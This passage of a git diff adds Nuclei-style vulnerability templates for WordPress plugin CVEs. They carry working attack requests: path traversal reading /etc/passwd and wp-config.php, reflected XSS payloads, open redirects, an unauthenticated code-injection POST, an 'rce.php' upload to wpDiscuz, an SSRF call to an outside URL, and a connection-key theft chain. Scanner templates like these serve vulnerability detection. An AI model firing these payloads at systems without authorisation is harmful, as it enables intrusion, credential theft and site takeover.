type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/poc/cve/CVE-2015-5461-2556.yaml b/poc/cve/CVE-2015-5461-2556.yaml new file mode 100644 index 0000000000..389a404f21 --- /dev/null +++ b/poc/cve/CVE-2015-5461-2556.yaml @@ -0,0 +1,21 @@ +id: CVE-2015-5461 +info: + name: StageShow <= 5.0.8 - Open Redirect + author: 0x_Akoko + severity: medium + description: Open redirect vulnerability in the Redirect function in stageshow_redirect.php in the StageShow plugin before 5.0.9 for WordPress allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the url parameter. + reference: + - https://wpscan.com/vulnerability/afc0d5b5-280f-424f-bc3e-d04452e56e16 + - https://nvd.nist.gov/vuln/detail/CVE-2015-5461 + classification: + cve-id: CVE-2015-5461 + tags: redirect,cve,cve2015,wordpress,wp-plugin +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/stageshow/stageshow_redirect.php?url=http%3A%2F%2Fexample.com" + matchers: + - type: regex + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' + part: header diff --git a/poc/cve/CVE-2015-9480-2630.yaml b/poc/cve/CVE-2015-9480-2630.yaml new file mode 100644 index 0000000000..b7aa9e0fe9 --- /dev/null +++ b/poc/cve/CVE-2015-9480-2630.yaml @@ -0,0 +1,28 @@ +id: CVE-2015-9480 +info: + name: WordPress Plugin RobotCPA 5 - Directory Traversal + author: daffainfo + severity: high + reference: + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-9480 + - https://www.exploit-db.com/exploits/37252 + tags: cve,cve2015,wordpress,wp-plugin,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2015-9480 + cwe-id: CWE-22 + description: "The RobotCPA plugin 5 for WordPress has directory traversal via the f.php l parameter." +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/robotcpa/f.php?l=ZmlsZTovLy9ldGMvcGFzc3dk" + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + part: body + - type: status + status: + - 200 diff --git a/poc/cve/CVE-2016-1000135-2684.yaml b/poc/cve/CVE-2016-1000135-2684.yaml new file mode 100644 index 0000000000..5fbb768196 --- /dev/null +++ b/poc/cve/CVE-2016-1000135-2684.yaml @@ -0,0 +1,35 @@ +id: CVE-2016-1000135 + +info: + name: HDW WordPress Video Gallery <= 1.2 - Reflected Cross-Site Scripting (XSS) via mychannel.php + author: daffainfo + severity: medium + description: Reflected XSS in wordpress plugin hdw-tube v1.2 + reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000135 + tags: cve,cve2016,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2016-1000135 + cwe-id: CWE-79 + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/hdw-tube/mychannel.php?channel=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/poc/cve/CVE-2016-1000146-2721.yaml b/poc/cve/CVE-2016-1000146-2721.yaml new file mode 100644 index 0000000000..e5f3bb2231 --- /dev/null +++ b/poc/cve/CVE-2016-1000146-2721.yaml @@ -0,0 +1,39 @@ +id: CVE-2016-1000146 + +info: + name: Pondol Form to Mail <= 1.1 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + description: Reflected XSS in wordpress plugin pondol-formmail v1.1 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2016-1000146 + - http://www.vapidlabs.com/wp/wp_advisory.php?v=787 + - https://wordpress.org/plugins/pondol-formmail + - http://www.securityfocus.com/bid/93584 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2016-1000146 + cwe-id: CWE-79 + tags: cve,cve2016,wordpress,xss,wp-plugin,mail + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/pondol-formmail/pages/admin-mail-info.php?itemid=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/poc/cve/CVE-2016-1000149-2728.yaml b/poc/cve/CVE-2016-1000149-2728.yaml new file mode 100644 index 0000000000..b74aee23a4 --- /dev/null +++ b/poc/cve/CVE-2016-1000149-2728.yaml @@ -0,0 +1,30 @@ +id: CVE-2016-1000149 +info: + name: Simpel Reserveren 3 <= 3.5.2 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000149 + tags: cve,cve2016,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2016-1000149 + cwe-id: CWE-79 + description: "Reflected XSS in wordpress plugin simpel-reserveren v3.5.2" +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/simpel-reserveren/edit.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + - type: word + part: header + words: + - text/html + - type: status + status: + - 200 diff --git a/poc/cve/CVE-2017-17043-2975.yaml b/poc/cve/CVE-2017-17043-2975.yaml new file mode 100644 index 0000000000..3a3a2296f1 --- /dev/null +++ b/poc/cve/CVE-2017-17043-2975.yaml @@ -0,0 +1,30 @@ +id: CVE-2017-17043 +info: + name: Emag Marketplace Connector 1.0 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + description: The Emag Marketplace Connector plugin 1.0.0 for WordPress has reflected XSS because the parameter "post" to /wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php is not filtered correctly. + reference: https://nvd.nist.gov/vuln/detail/CVE-2017-17043 + tags: cve,cve2017,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2017-17043 + cwe-id: CWE-79 +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php?post=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + - type: word + part: header + words: + - text/html + - type: status + status: + - 200 diff --git a/poc/cve/CVE-2017-18536-2993.yaml b/poc/cve/CVE-2017-18536-2993.yaml new file mode 100644 index 0000000000..4f60e9dca3 --- /dev/null +++ b/poc/cve/CVE-2017-18536-2993.yaml @@ -0,0 +1,35 @@ +id: CVE-2017-18536 + +info: + name: Stop User Enumeration 1.3.5-1.3.7 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + description: The Stop User Enumeration WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting (XSS) security vulnerability. + reference: https://wpscan.com/vulnerability/956cc5fd-af06-43ac-aa85-46b468c73501 + tags: cve,cve2017,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2017-18536 + cwe-id: CWE-79 + +requests: + - method: GET + path: + - "{{BaseURL}}/?author=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/poc/cve/CVE-2018-18069-3426.yaml b/poc/cve/CVE-2018-18069-3426.yaml new file mode 100644 index 0000000000..6ead1487c8 --- /dev/null +++ b/poc/cve/CVE-2018-18069-3426.yaml @@ -0,0 +1,24 @@ +id: CVE-2018-18069 +info: + name: Wordpress unauthenticated stored xss + author: nadino + severity: medium + description: process_forms in the WPML (aka sitepress-multilingual-cms) plugin through 3.6.3 for WordPress has XSS via any locale_file_name_ parameter (such as locale_file_name_en) in an authenticated theme-localization.php request to wp-admin/admin.php. + tags: cve,cve2018,wordpress,xss,plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2018-18069 + cwe-id: CWE-79 + reference: + - https://0x62626262.wordpress.com/2018/10/08/sitepress-multilingual-cms-plugin-unauthenticated-stored-xss/ +requests: + - method: POST + path: + - "{{BaseURL}}/wp-admin/admin.php" + body: 'icl_post_action=save_theme_localization&locale_file_name_en=EN">' + redirects: true + matchers: + - type: dsl + dsl: + - 'contains(tolower(all_headers), "text/html") && contains(set_cookie, "_icl_current_admin_language") && contains(body, "\">")' diff --git a/poc/cve/CVE-2018-3810-3554.yaml b/poc/cve/CVE-2018-3810-3554.yaml new file mode 100644 index 0000000000..0527d91a3c --- /dev/null +++ b/poc/cve/CVE-2018-3810-3554.yaml @@ -0,0 +1,49 @@ +id: CVE-2018-3810 + +info: + name: Oturia WordPress Smart Google Code Inserter <3.5 - Authentication Bypass + author: princechaddha + severity: critical + description: Oturia Smart Google Code Inserter plugin before 3.5 for WordPress allows unauthenticated attackers to insert arbitrary JavaScript or HTML code (via the sgcgoogleanalytic parameter) that runs on all pages served by WordPress. The saveGoogleCode() function in smartgooglecode.php does not check if the current request is made by an authorized user, thus allowing any unauthenticated user to successfully update the inserted code. + reference: + - https://www.exploit-db.com/exploits/43420 + - https://nvd.nist.gov/vuln/detail/CVE-2018-3810 + - https://wordpress.org/plugins/smart-google-code-inserter/#developers + - https://limbenjamin.com/articles/smart-google-code-inserter-auth-bypass.html + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2018-3810 + cwe-id: CWE-287 + tags: wordpress,cve,cve2018,google + +requests: + - method: POST + path: + - "{{BaseURL}}/wp-admin/options-general.php?page=smartcode" + + body: 'sgcgoogleanalytic=&sgcwebtools=&button=Save+Changes&action=savegooglecode' + headers: + Content-Type: application/x-www-form-urlencoded + + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + words: + - "text/html" + part: header + + - type: word + words: + - '' + part: body + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/05/13 diff --git a/poc/cve/CVE-2018-7422-3595.yaml b/poc/cve/CVE-2018-7422-3595.yaml new file mode 100644 index 0000000000..e5d8381a22 --- /dev/null +++ b/poc/cve/CVE-2018-7422-3595.yaml @@ -0,0 +1,37 @@ +id: CVE-2018-7422 +info: + name: WordPress Site Editor <=1.1.1 - Local File Inclusion + author: LuskaBol,0x240x23elu + severity: high + description: | + WordPress Site Editor through 1.1.1 allows remote attackers to retrieve arbitrary files via the ajax_path parameter to editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php. + reference: + - https://www.exploit-db.com/exploits/44340 + - http://seclists.org/fulldisclosure/2018/Mar/40 + - https://wpvulndb.com/vulnerabilities/9044 + - https://nvd.nist.gov/vuln/detail/CVE-2018-7422 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2018-7422 + cwe-id: CWE-22,CWE-829 + tags: cve,cve2018,wordpress,wp-plugin,lfi +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=../../../../../../../wp-config.php' + - "{{BaseURL}}/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd" + matchers-condition: or + matchers: + - type: word + part: body + words: + - "DB_NAME" + - "DB_PASSWORD" + condition: and + - type: regex + part: body + regex: + - "root:.*:0:0:" + +# Enhanced by mp on 2022/06/17 diff --git a/poc/cve/CVE-2018-8719-3640.yaml b/poc/cve/CVE-2018-8719-3640.yaml new file mode 100644 index 0000000000..022985a814 --- /dev/null +++ b/poc/cve/CVE-2018-8719-3640.yaml @@ -0,0 +1,35 @@ +id: CVE-2018-8719 + +info: + name: WordPress Plugin WP Security Audit Log 3.1.1 - Information Disclosure + author: LogicalHunter + severity: medium + description: Access to wp-content/uploads/wp-security-audit-log/* files is not restricted. For example, these files are indexed by Google and allows for attackers to possibly find sensitive information + reference: + - https://www.exploit-db.com/exploits/44371 + - https://vuldb.com/?id.115817 + - https://www.cvedetails.com/cve/CVE-2018-8719/ + tags: wordpress,wp-plugin,cve,cve2018,exposure + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2018-8719 + cwe-id: CWE-532 + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/uploads/wp-security-audit-log/failed-logins/" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "[TXT]" + - ".log" + - "Index of" + condition: and diff --git a/poc/cve/CVE-2018-9118-3654.yaml b/poc/cve/CVE-2018-9118-3654.yaml new file mode 100644 index 0000000000..2128af7254 --- /dev/null +++ b/poc/cve/CVE-2018-9118-3654.yaml @@ -0,0 +1,41 @@ +id: CVE-2018-9118 + +info: + name: WordPress 99 Robots WP Background Takeover Advertisements <=4.1.4 - Local File Inclusion + author: 0x_Akoko + severity: high + description: | + WordPress 99 Robots WP Background Takeover Advertisements 4.1.4 is susceptible to local file inclusion via exports/download.php. + reference: + - https://www.exploit-db.com/exploits/44417 + - https://wpvulndb.com/vulnerabilities/9056 + - https://99robots.com/docs/wp-background-takeover-advertisements/ + - https://nvd.nist.gov/vuln/detail/CVE-2018-9118 + remediation: | + Upgrade to 4.1.15. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2018-9118 + cwe-id: CWE-22 + tags: edb,cve,cve2018,wordpress,wp-plugin,lfi,traversal,wp + metadata: + max-request: 1 + +http: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/wpsite-background-takeover/exports/download.php?filename=../../../../wp-config.php' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "DB_NAME" + - "DB_PASSWORD" + - "DB_HOST" + - "The base configurations of the WordPress" + condition: and + +# Enhanced by mp on 2022/06/15 diff --git a/poc/cve/CVE-2019-14470-3854.yaml b/poc/cve/CVE-2019-14470-3854.yaml new file mode 100644 index 0000000000..fc6a5ee0a8 --- /dev/null +++ b/poc/cve/CVE-2019-14470-3854.yaml @@ -0,0 +1,39 @@ +id: CVE-2019-14470 + +info: + name: WordPress Plugin UserPro 4.9.32 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + description: cosenary Instagram-PHP-API (aka Instagram PHP API V2), as used in the UserPro plugin through 4.9.32 for WordPress, has XSS via the example/success.php error_description parameter. + reference: + - https://wpscan.com/vulnerability/9815 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14470 + - http://packetstormsecurity.com/files/154206/WordPress-UserPro-4.9.32-Cross-Site-Scripting.html + - https://wpvulndb.com/vulnerabilities/9815 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2019-14470 + cwe-id: CWE-79 + tags: cve,cve2019,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/userpro/lib/instagram/vendor/cosenary/instagram/example/success.php?error=&error_description=%3Csvg/onload=alert(1)%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/poc/cve/CVE-2019-15889-3905.yaml b/poc/cve/CVE-2019-15889-3905.yaml new file mode 100644 index 0000000000..f5e335b75a --- /dev/null +++ b/poc/cve/CVE-2019-15889-3905.yaml @@ -0,0 +1,38 @@ +id: CVE-2019-15889 + +info: + name: WordPress Plugin Download Manager 2.9.93 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + description: The download-manager plugin before 2.9.94 for WordPress has XSS via the category shortcode feature, as demonstrated by the orderby or search[publish_date] parameter. + reference: + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15889 + - https://www.cybersecurity-help.cz/vdb/SB2019041819 + - https://wordpress.org/plugins/download-manager/#developers + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2019-15889 + cwe-id: CWE-79 + tags: cve,cve2019,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wpdmpro/list-packages/?orderby=title%22%3E%3Cscript%3Ealert(1)%3C/script%3E&order=asc' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/poc/cve/CVE-2019-16525-3935.yaml b/poc/cve/CVE-2019-16525-3935.yaml new file mode 100644 index 0000000000..c0b2649797 --- /dev/null +++ b/poc/cve/CVE-2019-16525-3935.yaml @@ -0,0 +1,35 @@ +id: CVE-2019-16525 + +info: + name: Wordpress Plugin Checklist <= 1.1.5 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + description: An XSS issue was discovered in the checklist plugin before 1.1.9 for WordPress. The fill parameter is not correctly filtered in the checklist-icon.php file, and it is possible to inject JavaScript code. + reference: https://nvd.nist.gov/vuln/detail/CVE-2019-16525 + tags: cve,cve2019,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2019-16525 + cwe-id: CWE-79 + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/checklist/images/checklist-icon.php?&fill=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/poc/cve/CVE-2019-6715-4184.yaml b/poc/cve/CVE-2019-6715-4184.yaml new file mode 100644 index 0000000000..16bbedcfc0 --- /dev/null +++ b/poc/cve/CVE-2019-6715-4184.yaml @@ -0,0 +1,30 @@ +id: CVE-2019-6715 + +info: + name: CVE-2019-6715 + author: randomrobbie + severity: high + description: W3 Total Cache 0.9.2.6-0.9.3 - Unauthenticated Arbitrary File Read / SSRF + tags: cve,cve2019,wordpress,wp-plugin,ssrf + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2019-6715 + reference: + - https://vinhjaxt.github.io/2019/03/cve-2019-6715 + - http://packetstormsecurity.com/files/160674/WordPress-W3-Total-Cache-0.9.3-File-Read-Directory-Traversal.html + +requests: + - raw: + - | + PUT /wp-content/plugins/w3-total-cache/pub/sns.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + {"Type":"SubscriptionConfirmation","Message":"","SubscribeURL":"https://rfi.nessus.org/rfi.txt"} + + matchers: + - type: word + words: + - "TmVzc3VzQ29kZUV4ZWNUZXN0" + part: body \ No newline at end of file diff --git a/poc/cve/CVE-2020-13700-4510.yaml b/poc/cve/CVE-2020-13700-4510.yaml new file mode 100644 index 0000000000..42d1d0f6e1 --- /dev/null +++ b/poc/cve/CVE-2020-13700-4510.yaml @@ -0,0 +1,40 @@ +id: CVE-2020-13700 + +info: + name: acf-to-rest-api wordpress plugin IDOR + author: pikpikcu + severity: high + reference: https://gist.github.com/mariuszpoplwski/4fbaab7f271bea99c733e3f2a4bafbb5 + description: | + An issue was discovered in the acf-to-rest-api plugin through 3.1.0 for WordPress. + It allows an insecure direct object reference via permalinks manipulation, as demonstrated by a + wp-json/acf/v3/options/ request that reads sensitive information in the wp_options table, such as the login and pass values. + tags: cve,cve2020,wordpress,plugin + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2020-13700 + cwe-id: CWE-639 + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-json/acf/v3/options/a?id=active&field=plugins' + + matchers-condition: and + matchers: + + - type: word + words: + - 'Content-Type: application/json' + part: header + + - type: word + words: + - 'acf-to-rest-api\/class-acf-to-rest-api.php' + part: body + condition: and + + - type: status + status: + - 200 diff --git a/poc/cve/CVE-2020-17362-4655.yaml b/poc/cve/CVE-2020-17362-4655.yaml new file mode 100644 index 0000000000..09f0ba5b32 --- /dev/null +++ b/poc/cve/CVE-2020-17362-4655.yaml @@ -0,0 +1,34 @@ +id: CVE-2020-17362 +info: + name: Nova Lite < 1.3.9 - Unauthenticated Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + description: search.php in the Nova Lite theme before 1.3.9 for WordPress allows Reflected XSS. + reference: https://wpscan.com/vulnerability/30a83491-2f59-4c41-98bd-a9e6e5a609d4 + tags: cve,cve2020,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-17362 + cwe-id: CWE-79 +requests: + - method: GET + path: + - '{{BaseURL}}/?s=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + - type: word + words: + - "nova-lite" + part: body + - type: word + part: header + words: + - text/html + - type: status + status: + - 200 diff --git a/poc/cve/CVE-2020-24186-4794.yaml b/poc/cve/CVE-2020-24186-4794.yaml new file mode 100644 index 0000000000..db823bc245 --- /dev/null +++ b/poc/cve/CVE-2020-24186-4794.yaml @@ -0,0 +1,89 @@ +id: CVE-2020-24186 + +info: + name: Unauthenticated File upload wpDiscuz WordPress plugin RCE + author: Ganofins + severity: critical + description: WordPress wpDiscuz plugin version 7.0.4. This flaw gave unauthenticated attackers the ability to upload arbitrary files, including PHP files, and achieve remote code execution on a vulnerable site’s server. + reference: https://github.com/suncsr/wpDiscuz_unauthenticated_arbitrary_file_upload/blob/main/README.md + tags: cve,cve2020,wordpress,wp-plugin,rce + +requests: + - raw: + - | + GET /?p=1 HTTP/1.1 + Host: {{Hostname}} + Accept: */* + Connection: close + + - | + POST /wp-admin/admin-ajax.php HTTP/1.1 + Host: {{Hostname}} + Content-Length: 745 + Accept: */* + X-Requested-With: XMLHttpRequest + sec-ch-ua-mobile: ?0 + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 + Content-Type: multipart/form-data; boundary=----WebKitFormBoundary88AhjLimsDMHU1Ak + Origin: {{BaseURL}} + Sec-Fetch-Site: same-origin + Sec-Fetch-Mode: cors + Sec-Fetch-Dest: empty + Referer: {{BaseURL}} + Accept-Encoding: gzip, deflate + Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 + Connection: close + + ------WebKitFormBoundary88AhjLimsDMHU1Ak + Content-Disposition: form-data; name="action" + + wmuUploadFiles + ------WebKitFormBoundary88AhjLimsDMHU1Ak + Content-Disposition: form-data; name="wmu_nonce" + + {{wmuSecurity}} + ------WebKitFormBoundary88AhjLimsDMHU1Ak + Content-Disposition: form-data; name="wmuAttachmentsData" + + undefined + ------WebKitFormBoundary88AhjLimsDMHU1Ak + Content-Disposition: form-data; name="wmu_files[0]"; filename="rce.php" + Content-Type: image/png + + {{base64_decode('/9j/4WpFeGlmTU0q/f39af39Pv39/f39/f39/f2o/f39/cD9/f39/f39/f39/f/g/UpGSUb9/f39/9tD/f0M/QwK/f0=')}} + + ------WebKitFormBoundary88AhjLimsDMHU1Ak + Content-Disposition: form-data; name="postId" + + 1 + ------WebKitFormBoundary88AhjLimsDMHU1Ak-- + + extractors: + - type: regex + part: body + internal: true + name: wmuSecurity + group: 1 + regex: + - 'wmuSecurity":"([a-z0-9]+)' + + - type: regex + part: body + group: 1 + regex: + - '"url":"([a-z:\\/0-9-.]+)"' + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - 'success":true' + - 'fullname' + - 'shortname' + - 'url' + condition: and + part: body diff --git a/poc/cve/CVE-2020-29395-5006.yaml b/poc/cve/CVE-2020-29395-5006.yaml new file mode 100644 index 0000000000..9512b43c67 --- /dev/null +++ b/poc/cve/CVE-2020-29395-5006.yaml @@ -0,0 +1,38 @@ +id: CVE-2020-29395 + +info: + name: Wordpress Plugin EventON Calendar 3.0.5 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + description: The EventON plugin through 3.0.5 for WordPress allows addons/?q= XSS via the search field. + reference: + - https://github.com/mustgundogdu/Research/tree/main/EventON_PLUGIN_XSS + - https://nvd.nist.gov/vuln/detail/CVE-2020-29395 + - https://www.myeventon.com/news/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2020-29395 + cwe-id: CWE-79 + tags: cve,cve2020,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/addons/?q=%3Csvg%2Fonload%3Dalert(1)%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/poc/cve/CVE-2020-9043(1).yaml b/poc/cve/CVE-2020-9043(1).yaml new file mode 100644 index 0000000000..3a4e5cdd20 --- /dev/null +++ b/poc/cve/CVE-2020-9043(1).yaml @@ -0,0 +1,80 @@ +id: CVE-2020-9043 + +info: + name: WordPress wpCentral <1.5.1 - Information Disclosure + author: scent2d + severity: high + description: | + WordPress wpCentral plugin before 1.5.1 is susceptible to information disclosure. An attacker can access the connection key for WordPress Admin account and thus potentially obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to gain sensitive information from the wpCentral plugin. + remediation: | + Update the wpCentral plugin to version 1.5.1 or later to fix the information disclosure vulnerability. + reference: + - https://wpscan.com/vulnerability/10074 + - https://www.wordfence.com/blog/2020/02/vulnerability-in-wpcentral-plugin-leads-to-privilege-escalation/ + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9043 + - https://wordpress.org/plugins/wp-central/#developers + - https://nvd.nist.gov/vuln/detail/CVE-2020-9043 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2020-9043 + cwe-id: CWE-200 + epss-score: 0.04173 + epss-percentile: 0.91333 + cpe: cpe:2.3:a:wpcentral:wpcentral:*:*:*:*:*:wordpress:*:* + metadata: + verified: true + max-request: 4 + vendor: wpcentral + product: wpcentral + framework: wordpress + tags: cve,cve2020,wordpress,wp-plugin,wpcentral,authenticated,wp,wpscan + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 + - | + GET /wp-admin/index.php HTTP/1.1 + Host: {{Hostname}} + - | + GET /wp-login.php?action=logout&_wpnonce={{nonce}} HTTP/1.1 + Host: {{Hostname}} + - | + GET /wp-admin/admin-ajax.php?action=my_wpc_signon&auth_key={{authkey}} HTTP/1.1 + Host: {{Hostname}} + + host-redirects: true + max-redirects: 2 + matchers: + - type: dsl + dsl: + - "contains(header_4, 'text/html')" + - "status_code_4 == 200" + - "contains(body_4, 'wpCentral Connection Key')" + - contains(body_4, "pagenow = \'dashboard\'") + condition: and + + extractors: + - type: regex + name: authkey + group: 1 + regex: + - 'style="word-wrap:break-word;">([a-z0-9]+)' + internal: true + part: body + + - type: regex + name: nonce + group: 1 + regex: + - '_wpnonce=([0-9a-z]+)' + internal: true + part: body +# digest: 490a0046304402204bffb24bf04e56aff7c5c70589b7ecbf9c04db1c030e793573251a9f104c2e1d02207a1cb6691600aaceae61e38e6ec3a9e54d43209ae9a6a254ab763e9a2b031198:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2021-24210-5640.yaml b/poc/cve/CVE-2021-24210-5640.yaml new file mode 100644 index 0000000000..50b0897459 --- /dev/null +++ b/poc/cve/CVE-2021-24210-5640.yaml @@ -0,0 +1,29 @@ +id: CVE-2021-24210 + +info: + name: PhastPress < 1.111 - Open Redirect + author: 0x_Akoko + description: | + There is an open redirect in the PhastPress WordPress plugin before 1.111 that allows an attacker to malform a request to a page + with the plugin and then redirect the victim to a malicious page. There is also a support comment from another user one year + ago (https://wordpress.org/support/topic/phast-php-used-for-remote-fetch/) that says that the php involved in the request only + go to whitelisted pages but it's possible to redirect the victim to any domain. + reference: https://wpscan.com/vulnerability/9b3c5412-8699-49e8-b60c-20d2085857fb + severity: medium + tags: wordpress,cve,cve2021,redirect + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + 